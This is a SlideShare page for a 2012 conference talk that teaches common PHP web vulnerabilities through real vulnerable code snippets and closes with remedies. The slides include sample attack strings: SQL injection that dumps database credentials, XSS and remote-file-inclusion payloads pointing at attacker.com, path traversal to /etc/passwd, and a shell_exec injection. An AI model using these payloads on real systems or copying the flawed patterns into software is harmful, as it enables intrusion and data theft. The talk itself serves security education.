SlideShare uma empresa Scribd logo

Spot the Web Vulnerability

Miroslav Stampar
Miroslav Stampar

These are the slides from a talk "Spot the Web Vulnerability" held at Hacktivity 2012 conference (Hungary / Budapest 12th–13th October 2012) by Miroslav Stampar.

Tecnologia
1 de 35
Baixar para ler offline
Spot the Web Vulnerability Miroslav Štampar (dev@sqlmap.org)
Talk overview  Introduction to commonly exploited web application vulnerability classes (covering only those caused by coding mistake(s))  Usage of code review on real-life vulnerabilities as an educational tool  Mitigation in form of remedies  Note: While given examples will discuss PHP coding (due to its overwhelming popularity on the Web), the concepts also apply to any other web programming language October 13th, 2012 2
Vulnerability statistics (1) October 13th, 2012 3
Vulnerability statistics (2) Name Visits Platform Date vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability 31961 php 2010-08-29 WordPress <= 3.3.1 Multiple Vulnerabilities 25960 php 2012-01-25 WordPress 3.1.3 SQL Injection Vulnerabilities 25168 php 2011-07-01 Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection 24166 php 2011-07-21 Vulnerability 0-day vBulletin(R) 3.8.6 faq.php Information Disclosure 22850 php 2010-07-24 Vulnerability vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection 19074 php 2011-05-23 Vulnerability Bypass the JQuery-Real-Person captcha plugin 0-day 17089 php 2011-11-28 FCKeditor all version Arbitrary File Upload Vulnerability 16211 php 2011-08-09 Joomla 1.5 URL Redirecting Vulnerability 16061 php 2010-08-24 WordPress TimThumb Plugin - Remote Code Execution 15991 php 2011-08-03 October 13th, 2012 4
SQL injection (1)  Vulnerability on dynamic database queries that include unfiltered user supplied input  Usually result of concatenation of raw parameter values to a desired SQL statement  Various techniques used depending on target's environment and affected vulnerable query  The goal is unauthorized access to the underlying database  Involved in 60% of all breach incidents examined by 7Safe in 2010 October 13th, 2012 5
SQL injection (2)  Example of vulnerable code (vuln.php): <?php ... $sql = "SELECT * FROM forum_logs WHERE id = " . $_GET["id"]; $result = mysql_query($sql); ... ?>  Sample attack: http://www.target.com/vuln.php?id=1 UNION ALL SELECT NULL,CONCAT(user,0x3a,password),NULL FROM mysql.user-- October 13th, 2012 6
Cross-site scripting (1)  Enables attackers to inject client-side script into web pages viewed by other users  Everything from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible  Persistent (stored) and non-persistent (reflected) variants  Samy (JS.Spacehero), first known XSS worm, infected over 1 million MySpace profiles in less than 20 hours October 13th, 2012 7
Cross-site scripting (2)  Example of vulnerable code (vuln.php): <?php $name = $_GET['name']; echo "Welcome $name<br>"; echo "<a href="http://www.site.com/">Click to Visit</a>"; ?>  Sample attack: http://www.target.com/vuln.php? name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href ="http://www.attacker.com/";}</script> October 13th, 2012 8
File inclusion (1)  Allows inclusion of arbitrary code into vulnerable application for further execution  Local file (LFI) and remote file (RFI) variants  Attacker's fondest wish (especially RFI)  Access anything that the original program context is able to (configuration files, password files, etc.)  Involved in 21% of all web application attacks observed by Imperva in 2011 October 13th, 2012 9
File inclusion (2)  Example of vulnerable code (vuln.php): <?php $page = 'index'; if (isset($_REQUEST['page'])) $page = $_REQUEST['page']; include($page . '.php'); ?>  Sample attack: http://www.target.com/vuln.php? page=http://www.attacker.com/shell.php?foo= October 13th, 2012 10
File disclosure (1)  Access files that are not intended to be accessible and expose their content to the attackers  Directory traversal variant in cases when characters for traverse to the parent directory (e.g. ../) are passed through to the file API(s)  Local file inclusion becomes a variant too if used for obtaining a non-script content  Easiest for exploitation October 13th, 2012 11
File disclosure (2)  Example of vulnerable code (vuln.php): <?php $template = 'default.php'; if (isset($_COOKIE['template'])) $template = $_COOKIE['template']; readfile("templates/" . $template); ?>  Sample attack: GET /vuln.php HTTP/1.0 Cookie: template= ../../../../../../../../../etc/passwd October 13th, 2012 12
Remote code execution (1)  Provides a way to execute arbitrary code  In one variant provided code is being executed inside the vulnerable web application (e.g. eval)  In other, more common, content of one of request parameters is being written to the browser reachable file, giving attacker opportunity to run it as a standalone script  TimThumb WordPress PHP plugin vulnerability (CVE: 2011-4106) affected 1.2 million websites October 13th, 2012 13
Remote code execution (2)  Example of vulnerable code (vuln.php): <?php $fp = fopen("prefs/timezone.php", "w"); fwrite($fp, "<?phprn$timezone=" . $_REQUEST['tz'] . ";rn?>"); fclose($fp); ?>  Sample attack: http://www.target.com/vuln.php? tz=us;shell_exec($_GET['cmd']) http://www.target.com/prefs/timezone.php?cmd=cat /etc/passwd October 13th, 2012 14
Spot SQL injection (1) (EDB-ID: 18820, CVE: 2012-1002, if (isset($_POST['authornum']) && ctype_digit($_POST['authornum'])) { OpenConf <= 4.11 OSVDB-ID: 78996) $oc_authorNum = $_POST['authornum']; } else { $anr = ocsql_query("SELECT * FROM `" . OCC_TABLE_PAPER . "` WHERE `paperid`=" . safeSQLstr($_POST['pid'])) or err("Unable to retrieve submission information"); if (mysql_num_rows($anr) != 1) { err(oc_('Submission ID or password entered is incorrect')); } October 13th, 2012 15
Spot SQL injection (2) (EDB-ID: 19264, OSVDB-ID: 83231) if(empty($cookies['language'])){ setcookie('MyTickets_language', MyTickets <= v2.0.8 $setting['default_language'],time()+86400,"/"); $language = $setting['default_language']; } else { if($db->count('languages',"`id`='". $cookies['language']."'") == 0){ $language = $setting['default_language']; } $language = $cookies['language']; } $language_array = $db->fetch($db->query("SELECT * FROM `languages` WHERE `id`='".$language."'")); October 13th, 2012 16
WP-Predict Plugin for WordPress <= v1.0 Spot SQL injection (3) foreach ($postPredicts as $postPredict){ (EDB-ID: 19715, OSVDB-ID: 83697) ... if ($_POST['postAction'] == "submitVote" && intval($_POST['predictId']) == $postPredict- >predictId) { $submitPredictId = $_POST['predictId']; $selectedOption = $_POST['predictSelection']; ... $dbResult = @$wpdb->query("INSERT INTO " . $wpdb->prefix . "wpp_predict_votes (predictEntryId, predictUserId, predictSelectedOption) VALUES (" . $submitPredictId . ", " . $user_ID . ", " . $selectedOption . ")"); ... } October 13th, 2012 17
Spot SQL injection (4) (EDB-ID: 18516, OSVDB-ID: 79497) $start['year'] = isset($_GET['sy']) ? phpDenora <= v1.4.6 htmlspecialchars($_GET['sy']) : date('Y'); $start['month'] = isset($_GET['sm']) ? htmlspecialchars($_GET['sm']) : date('m'); $start['day'] = isset($_GET['sd']) ? htmlspecialchars($_GET['sd']) : date('d'); ... $sidq = sql_query("SELECT `id` FROM $table WHERE year = '".$start['year']."' AND month = '". $start['month']."' AND day = '".$start['day']."'"); October 13th, 2012 18
AdRotate Plugin for WordPress <= v3.6.6 Spot SQL injection (5) (EDB-ID: 18114, CVE: 2011-4671, if(isset($_GET['track']) OR $_GET['track'] != '') { OSVDB-ID: 77507) $meta = base64_decode($_GET['track']); ... list($ad, $group, $block) = explode("-", $meta); ... $bannerurl = $wpdb->get_var($wpdb- >prepare("SELECT `link` FROM `".$prefix."adrotate` WHERE `id` = '".$ad."' LIMIT 1;")); ... } October 13th, 2012 19
WP Bannerize Plugin for WordPress <= v2.8.7 Spot SQL injection (6) (EDB-ID: 17906, OSVDB-ID: 76658) if (@isset($_SERVER['HTTP_X_REQUESTED_WITH'])) { ... $limit = intval($_POST['limit']); $page_offset = (intval($_POST['offset']) - 1) * $limit; foreach($_POST["item"] as $key => $value){ $sql = sprintf("UPDATE `%s` SET `sorter` = %s WHERE id = %s", $wpdb->prefix ."bannerize_b", (intval($key)+$page_offset), $value); $result = mysql_query($sql); } } October 13th, 2012 20
Spot cross-site scripting (1) (EDB-ID: 11017, OSVDB-ID: 61594) PHPDug <= v2.0.0 $page = new HtmlTemplate("templates/" . $config['tpl_name'] . "/index.html"); ... $page->SetParameter('UPCOMING_LINK', $config['site_url'].'upcoming.php?id='.$_GET['id']); $page->SetParameter('POPULAR_LINK', $config['site_url'].'index.php'); ... $page->CreatePageEcho($lang,$config); October 13th, 2012 21
Spot cross-site scripting (2) function _wp_comment_row($comment_id, $mode, (EDB-ID: 9250, CVE: 2009-2851, $comment_status, $checkbox = true, $from_ajax = WordPress <= v2.8.1 false) { OSVDB-ID: 56193) $comment = get_comment($comment_id); ... $author_url = get_comment_author_url(); ... $author_url_display = $author_url; ... echo "<a title='$author_url' href= '$author_url'>$author_url_display</a><br/>"; ... } ... foreach ($comments as $comment) _wp_comment_row($comment->comment_ID, $mode, $comment_status); October 13th, 2012 22
Spot cross-site scripting (3) damianov.net Shoutbox <= v1.0 $handle = fopen($shoutsFile,"a"); $toWrite="n".stripslashes($_POST["txtNick"]) . "|" . $_POST["txtEmail"] . "|" . stripslashes($_POST["txtShout"]); (EDB-ID: 12593) fwrite($handle, $toWrite); fclose($handle); ... $lines = array_reverse(file($shoutsFile)); foreach ($lines as $line_num => $line) { $info = explode("|", $line, 3); if ((is_email($info[1])) && $displayEmails) $info[0] = "<a href='mailto:" . $info[1] . "'>" . $info[0] . "</a>"; echo "<div style='$fontStyle'><b>$info[0]</b> : " . ($allowHTML ? $info[2] : strip_tags($info[2])) . "</div>n"; // CVE-2004-0595 (strip_tags() bypass) } October 13th, 2012 23
Spot file inclusion (1) (EDB-ID: 15166, OSVDB-ID: 68300) Zen Cart <= v1.3.9f $typefilter = 'default'; if (isset($_GET['typefilter'])) $typefilter = $_GET['typefilter']; require(DIR_WS_INCLUDES . zen_get_index_filters_directory($typefilter . '_filter.php')); October 13th, 2012 24
Spot file inclusion (2) (EDB-ID: 19550, OSVDB-ID: 83700) if (isset($_POST['lang']) && preg_replace("#.*/#","", phpMyBackupPro <= v2.2 $_SERVER['PHP_SELF'])=="config.php" $CONF['lang']=$_POST['lang']; if (!isset($CONF['lang'])) $CONF['lang']="english"; if (!file_exists($prepath.PMBP_LANGUAGE_DIR. $CONF['lang'].".inc.php")) include_once($prepath.PMBP_LANGUAGE_DIR . "english.inc.php"); else include($prepath.PMBP_LANGUAGE_DIR . $CONF['lang'].".inc.php"); October 13th, 2012 25
Relocate Upload Plugin for WordPress <= Spot file inclusion (3) (EDB-ID: 17869, CVE: 2012-1205, OSVDB-ID: 79250) if (isset($_GET['ru_folder'])) { v0.14 define('WP_USE_THEMES', false); require_once(urldecode($_GET['abspath']) . '/wp-load.php'); ... } October 13th, 2012 26
Spot file disclosure (1) ISPworker <= v1.23 (EDB-ID: 10262) header('Content-type: ' . $_REQUEST[type]); header('Content-Disposition: attachment; filename="' . $_REQUEST[filename] . '"'); readfile("./tmp/$ticketid" . "_" . $_REQUEST[filename]); October 13th, 2012 27
PICA Photo Gallery Plugin for WordPress <= Spot file disclosure (2) (EDB-ID: 19016, OSVDB-ID: 82702) $timg = $imgname = $_REQUEST['imgname']; $pluginName = 'pica-photo-gallery'; $file = dirname(dirname(dirname(__FILE__))) . "/uploads/" . $pluginName . "/" . $timg; header('Content-Description: File Transfer'); v1.0 header('Content-Type: application/octet-stream'); ... header('Content-Length: ' . filesize($file)); ob_clean(); flush(); readfile($file); October 13th, 2012 28
Spot remote code execution (1) (EDB-ID: 18775, CVE: 2012-1495, $file = '../includes/settings.php'; ... WebCalendar <= v1.2.4 $settings['single_user_login'] = getPostValue OSVDB-ID: 81329) ('form_single_user_login'); ... $fd = @fopen ($file, 'w+b', false); ... fwrite ($fd, "<?phprn"); fwrite ($fd, '/* updated via install/index.php on ' . date ('r') . "rn"); foreach ($settings as $k => $v) { if ($v != '<br />' && $v != '') fwrite ($fd, $k . ': ' . $v . "rn"); } October 13th, 2012 29
Spot remote code execution (2) Ajax File and Image Manager <= v1.0 (EDB-ID: 18075, CVE: 2011-4825, @ob_start(); displayArray($_POST); writeInfo(@ob_get_clean()); OSVDB-ID: 76928) ... function writeInfo($data, $die = false) { $fp = @fopen(dirname(__FILE__) . DIRECTORY_SEPARATOR . 'data.php', 'w+'); @fwrite($fp, $data); @fwrite($fp, "nn" . date('d/M/Y H:i:s')); @fclose($fp); ... } October 13th, 2012 30
Remedies (1)  Data validation Process of ensuring that application is running with correct data Discard if it doesn’t pass the validation process if (!preg_match('/^(?d{3})?[-s.]?d{3}[-s.]d{4}$/', $phone)) { echo "Your phone number is invalid"; die(); } October 13th, 2012 31
Remedies (2)  Data sanitization Removing any unwanted bits from the data and normalizing it to the correct form $comment = strip_tags($_POST['comment']); ... $id = intval($_GET['id']); ... $username = preg_replace('/[^a-zA-Z0-9._]/', '', $_REQUEST['username']); ... $query = sprintf("SELECT * FROM users WHERE user='%s' AND password='%s'", mysql_real_escape_string($user), mysql_real_escape_string($password)); October 13th, 2012 32
Remedies (3)  Output escaping Protecting integrity of displayed data Prevents browser from applying any unintended meaning to any special sequence of characters that may be found Always escape output provided by users! echo "You searched for: " . htmlspecialchars($_GET["query"], ENT_QUOTES); October 13th, 2012 33
Remedies (4)  Safe communication with a database Prepared statements use one channel for commands and another one for data (which never allows commands) $db = new PDO('dblib:host=localhost; dbname=testdb; charset=UTF-8', $user, $pass); $query = 'SELECT * FROM users WHERE id = :id'; $stmt = $db->prepare($query); $stmt->bindValue(':id', $_REQUEST['id']); $stmt->execute(); while($row = $stmt->fetch(PDO::FETCH_ASSOC)) { ... October 13th, 2012 34
Questions? October 13th, 2012 35

Recomendados

2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)Miroslav Stampar
 
It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)Miroslav Stampar
 
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacksAnalysis of mass SQL injection attacks
Analysis of mass SQL injection attacksMiroslav Stampar
 
Hash DoS Attack
Hash DoS AttackHash DoS Attack
Hash DoS AttackMiroslav Stampar
 
sqlmap - security development in Python
sqlmap - security development in Pythonsqlmap - security development in Python
sqlmap - security development in PythonMiroslav Stampar
 
Data Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksData Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksMiroslav Stampar
 
Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Bernardo Damele A. G.
 
Got database access? Own the network!
Got database access? Own the network!Got database access? Own the network!
Got database access? Own the network!Bernardo Damele A. G.
 

Recomendados

2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)Miroslav Stampar
 
It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)Miroslav Stampar
 
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacksAnalysis of mass SQL injection attacks
Analysis of mass SQL injection attacksMiroslav Stampar
 
Hash DoS Attack
Hash DoS AttackHash DoS Attack
Hash DoS AttackMiroslav Stampar
 
sqlmap - security development in Python
sqlmap - security development in Pythonsqlmap - security development in Python
sqlmap - security development in PythonMiroslav Stampar
 
Data Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksData Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksMiroslav Stampar
 
Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Bernardo Damele A. G.
 
Got database access? Own the network!
Got database access? Own the network!Got database access? Own the network!
Got database access? Own the network!Bernardo Damele A. G.
 
Java
JavaJava
Java박 경민
 
DNS exfiltration using sqlmap
DNS exfiltration using sqlmapDNS exfiltration using sqlmap
DNS exfiltration using sqlmapMiroslav Stampar
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmapHerman Duarte
 
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IAS
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IASEnable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IAS
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IASInvenire Aude
 
Not so blind SQL Injection
Not so blind SQL InjectionNot so blind SQL Injection
Not so blind SQL InjectionFrancisco Ribeiro
 
TO Hack an ASP .NET website?
TO Hack an ASP .NET website? TO Hack an ASP .NET website?
TO Hack an ASP .NET website? Positive Hack Days
 
Apache Beam de A à Z
Apache Beam de A à Z Apache Beam de A à Z
Apache Beam de A à ZParis Data Engineers !
 
Java file
Java fileJava file
Java filesonnetdp
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)Bernardo Damele A. G.
 
Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9sumsid1234
 
SSRF workshop
SSRF workshop SSRF workshop
SSRF workshop Ivan Novikov
 
Java Input Output and File Handling
Java Input Output and File HandlingJava Input Output and File Handling
Java Input Output and File HandlingSunil OS
 
I/O in java Part 1
I/O in java Part 1I/O in java Part 1
I/O in java Part 1ashishspace
 
Sql Injection 0wning Enterprise
Sql Injection 0wning EnterpriseSql Injection 0wning Enterprise
Sql Injection 0wning Enterprisen|u - The Open Security Community
 
Java File I/O
Java File I/OJava File I/O
Java File I/OCanterbury HS
 
Strategies to design FUD malware
Strategies to design FUD malwareStrategies to design FUD malware
Strategies to design FUD malwarePedro Tavares
 
Windows persistence presentation
Windows persistence presentationWindows persistence presentation
Windows persistence presentationOlehLevytskyi1
 
Expanding the control over the operating system from the database
Expanding the control over the operating system from the databaseExpanding the control over the operating system from the database
Expanding the control over the operating system from the databaseBernardo Damele A. G.
 
7 streams and error handling in java
7 streams and error handling in java7 streams and error handling in java
7 streams and error handling in javaJyoti Verma
 
SQL injection exploitation internals
SQL injection exploitation internalsSQL injection exploitation internals
SQL injection exploitation internalsBernardo Damele A. G.
 
Smashing the Buffer
Smashing the BufferSmashing the Buffer
Smashing the BufferMiroslav Stampar
 
Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and NowMiroslav Stampar
 

Mais conteúdo relacionado

Mais procurados

DNS exfiltration using sqlmap
DNS exfiltration using sqlmapDNS exfiltration using sqlmap
DNS exfiltration using sqlmapMiroslav Stampar
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmapHerman Duarte
 
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IAS
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IASEnable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IAS
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IASInvenire Aude
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)Bernardo Damele A. G.
 
Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9sumsid1234
 
Java Input Output and File Handling
Java Input Output and File HandlingJava Input Output and File Handling
Java Input Output and File HandlingSunil OS
 
I/O in java Part 1
I/O in java Part 1I/O in java Part 1
I/O in java Part 1ashishspace
 
Strategies to design FUD malware
Strategies to design FUD malwareStrategies to design FUD malware
Strategies to design FUD malwarePedro Tavares
 
Windows persistence presentation
Windows persistence presentationWindows persistence presentation
Windows persistence presentationOlehLevytskyi1
 
Expanding the control over the operating system from the database
Expanding the control over the operating system from the databaseExpanding the control over the operating system from the database
Expanding the control over the operating system from the databaseBernardo Damele A. G.
 
7 streams and error handling in java
7 streams and error handling in java7 streams and error handling in java
7 streams and error handling in javaJyoti Verma
 
SQL injection exploitation internals
SQL injection exploitation internalsSQL injection exploitation internals
SQL injection exploitation internalsBernardo Damele A. G.
 

Mais procurados (20)

Java
JavaJava
Java
 
DNS exfiltration using sqlmap
DNS exfiltration using sqlmapDNS exfiltration using sqlmap
DNS exfiltration using sqlmap
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmap
 
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IAS
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IASEnable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IAS
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IAS
 
Not so blind SQL Injection
Not so blind SQL InjectionNot so blind SQL Injection
Not so blind SQL Injection
 
TO Hack an ASP .NET website?
TO Hack an ASP .NET website? TO Hack an ASP .NET website?
TO Hack an ASP .NET website?
 
Apache Beam de A à Z
Apache Beam de A à Z Apache Beam de A à Z
Apache Beam de A à Z
 
Java file
Java fileJava file
Java file
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)
 
Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9
 
SSRF workshop
SSRF workshop SSRF workshop
SSRF workshop
 
Java Input Output and File Handling
Java Input Output and File HandlingJava Input Output and File Handling
Java Input Output and File Handling
 
I/O in java Part 1
I/O in java Part 1I/O in java Part 1
I/O in java Part 1
 
Sql Injection 0wning Enterprise
Sql Injection 0wning EnterpriseSql Injection 0wning Enterprise
Sql Injection 0wning Enterprise
 
Java File I/O
Java File I/OJava File I/O
Java File I/O
 
Strategies to design FUD malware
Strategies to design FUD malwareStrategies to design FUD malware
Strategies to design FUD malware
 
Windows persistence presentation
Windows persistence presentationWindows persistence presentation
Windows persistence presentation
 
Expanding the control over the operating system from the database
Expanding the control over the operating system from the databaseExpanding the control over the operating system from the database
Expanding the control over the operating system from the database
 
7 streams and error handling in java
7 streams and error handling in java7 streams and error handling in java
7 streams and error handling in java
 
SQL injection exploitation internals
SQL injection exploitation internalsSQL injection exploitation internals
SQL injection exploitation internals
 

Destaque

Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and NowMiroslav Stampar
 
Проект змін до ЗУ «Про сприяння соціальному становленню та розвитку молоді в ...
Проект змін до ЗУ «Про сприяння соціальному становленню та розвитку молоді в ...Проект змін до ЗУ «Про сприяння соціальному становленню та розвитку молоді в ...
Проект змін до ЗУ «Про сприяння соціальному становленню та розвитку молоді в ...ProstirUA
 
Heuristic methods used in sqlmap
Heuristic methods used in sqlmapHeuristic methods used in sqlmap
Heuristic methods used in sqlmapMiroslav Stampar
 
sqlmap - why (not how) it works?
sqlmap - why (not how) it works?sqlmap - why (not how) it works?
sqlmap - why (not how) it works?Miroslav Stampar
 
Alan kakareka. insight into russian black market
Alan kakareka. insight into russian black marketAlan kakareka. insight into russian black market
Alan kakareka. insight into russian black marketYury Chemerkin
 
Webapplicationsecurity05 2010 100601100553 Phpapp02
Webapplicationsecurity05 2010 100601100553 Phpapp02Webapplicationsecurity05 2010 100601100553 Phpapp02
Webapplicationsecurity05 2010 100601100553 Phpapp02Rafel Ivgi
 
The Market for Cyber Weapons - NATO Cooperative Cyber Defence Centre of Exce...
The Market for Cyber Weapons - NATO Cooperative Cyber Defence Centre of Exce... The Market for Cyber Weapons - NATO Cooperative Cyber Defence Centre of Exce...
The Market for Cyber Weapons - NATO Cooperative Cyber Defence Centre of Exce...SignalSEC Ltd.
 
0Day Hunting A.K.A. The Story of a Proper CPE Test by Balazs Bacsay
0Day Hunting A.K.A. The Story of a Proper CPE Test by Balazs Bacsay0Day Hunting A.K.A. The Story of a Proper CPE Test by Balazs Bacsay
0Day Hunting A.K.A. The Story of a Proper CPE Test by Balazs BacsayShakacon
 
Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and NowMiroslav Stampar
 
Alfonso De Gregorio - Vulnerabilities and Their Surrounding Ethical Questions...
Alfonso De Gregorio - Vulnerabilities and Their Surrounding Ethical Questions...Alfonso De Gregorio - Vulnerabilities and Their Surrounding Ethical Questions...
Alfonso De Gregorio - Vulnerabilities and Their Surrounding Ethical Questions...HackIT Ukraine
 
Vulnerability Intelligence and Assessment with vulners.com
Vulnerability Intelligence and Assessment with vulners.comVulnerability Intelligence and Assessment with vulners.com
Vulnerability Intelligence and Assessment with vulners.comAlexander Leonov
 
Advanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security ManagementAdvanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security ManagementMayur Nanotkar
 
Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngDmitry Evteev
 

Destaque (17)

Smashing the Buffer
Smashing the BufferSmashing the Buffer
Smashing the Buffer
 
Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and Now
 
Curious Case of SQLi
Curious Case of SQLiCurious Case of SQLi
Curious Case of SQLi
 
Проект змін до ЗУ «Про сприяння соціальному становленню та розвитку молоді в ...
Проект змін до ЗУ «Про сприяння соціальному становленню та розвитку молоді в ...Проект змін до ЗУ «Про сприяння соціальному становленню та розвитку молоді в ...
Проект змін до ЗУ «Про сприяння соціальному становленню та розвитку молоді в ...
 
sqlmap - Under the Hood
sqlmap - Under the Hoodsqlmap - Under the Hood
sqlmap - Under the Hood
 
Heuristic methods used in sqlmap
Heuristic methods used in sqlmapHeuristic methods used in sqlmap
Heuristic methods used in sqlmap
 
sqlmap - why (not how) it works?
sqlmap - why (not how) it works?sqlmap - why (not how) it works?
sqlmap - why (not how) it works?
 
Alan kakareka. insight into russian black market
Alan kakareka. insight into russian black marketAlan kakareka. insight into russian black market
Alan kakareka. insight into russian black market
 
Webapplicationsecurity05 2010 100601100553 Phpapp02
Webapplicationsecurity05 2010 100601100553 Phpapp02Webapplicationsecurity05 2010 100601100553 Phpapp02
Webapplicationsecurity05 2010 100601100553 Phpapp02
 
The Market for Cyber Weapons - NATO Cooperative Cyber Defence Centre of Exce...
The Market for Cyber Weapons - NATO Cooperative Cyber Defence Centre of Exce... The Market for Cyber Weapons - NATO Cooperative Cyber Defence Centre of Exce...
The Market for Cyber Weapons - NATO Cooperative Cyber Defence Centre of Exce...
 
0Day Hunting A.K.A. The Story of a Proper CPE Test by Balazs Bacsay
0Day Hunting A.K.A. The Story of a Proper CPE Test by Balazs Bacsay0Day Hunting A.K.A. The Story of a Proper CPE Test by Balazs Bacsay
0Day Hunting A.K.A. The Story of a Proper CPE Test by Balazs Bacsay
 
Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and Now
 
Alfonso De Gregorio - Vulnerabilities and Their Surrounding Ethical Questions...
Alfonso De Gregorio - Vulnerabilities and Their Surrounding Ethical Questions...Alfonso De Gregorio - Vulnerabilities and Their Surrounding Ethical Questions...
Alfonso De Gregorio - Vulnerabilities and Their Surrounding Ethical Questions...
 
Vulnerability Intelligence and Assessment with vulners.com
Vulnerability Intelligence and Assessment with vulners.comVulnerability Intelligence and Assessment with vulners.com
Vulnerability Intelligence and Assessment with vulners.com
 
External XML Entities
External XML EntitiesExternal XML Entities
External XML Entities
 
Advanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security ManagementAdvanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security Management
 
Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall Eng
 

Semelhante a Spot the Web Vulnerability

Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And AnishOSSCube
 
Jeff Channell - Secure PHP Coding Practices
Jeff Channell - Secure PHP Coding PracticesJeff Channell - Secure PHP Coding Practices
Jeff Channell - Secure PHP Coding Practicesvdrover
 
Laravel for Web Artisans
Laravel for Web ArtisansLaravel for Web Artisans
Laravel for Web ArtisansRaf Kewl
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10Sastry Tumuluri
 
Varnish, the high performance valhalla?
Varnish, the high performance valhalla?Varnish, the high performance valhalla?
Varnish, the high performance valhalla?Jeroen van Dijk
 
[Poland] It's only about frontend
[Poland] It's only about frontend[Poland] It's only about frontend
[Poland] It's only about frontendOWASP EEE
 
Intro to php
Intro to phpIntro to php
Intro to phpSp Singh
 

Semelhante a Spot the Web Vulnerability (20)

Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And Anish
 
Jeff Channell - Secure PHP Coding Practices
Jeff Channell - Secure PHP Coding PracticesJeff Channell - Secure PHP Coding Practices
Jeff Channell - Secure PHP Coding Practices
 
Php Security
Php SecurityPhp Security
Php Security
 
Quebec pdo
Quebec pdoQuebec pdo
Quebec pdo
 
Laravel for Web Artisans
Laravel for Web ArtisansLaravel for Web Artisans
Laravel for Web Artisans
 
SQL Injection: complete walkthrough (not only) for PHP developers
